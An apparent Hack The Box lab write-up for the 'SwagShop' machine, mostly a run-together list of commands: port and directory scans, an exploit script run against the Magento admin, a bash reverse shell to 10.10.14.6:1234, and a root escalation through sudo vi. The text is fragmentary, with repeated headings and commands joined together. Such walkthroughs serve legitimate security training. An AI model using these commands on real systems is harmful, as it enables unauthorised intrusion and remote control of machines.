HTB | SwagShop
Skill Learned
NMAP
nmap -sT -p- --min-rate 10000 10.10.10.140

Port 80





Foothold/shell






Priv Esc



Last updated
nmap -sT -p- --min-rate 10000 10.10.10.140















Last updated
nmap -sC -sV -p 22,80 10.10.10.140dirsearch -u http://swagshop.htb/ -e php,html -x 403,404dirsearch -u http://swagshop.htb/index.php/ -e php,html -x 403,404python 37811.py 'http://swagshop.htb/index.php/admin' "uname -a"python 37811.py 'http://swagshop.htb/index.php/admin' "bash -c 'exec bash -i>& /dev/tcp/10.10.14.6/1234 0>&1'"sudo -lsudo /usr/bin/vi /var/www/html/../../../root/root.txtsudo /usr/bin/vi /var/www/html/a
:set shell=/bin/sh
:shell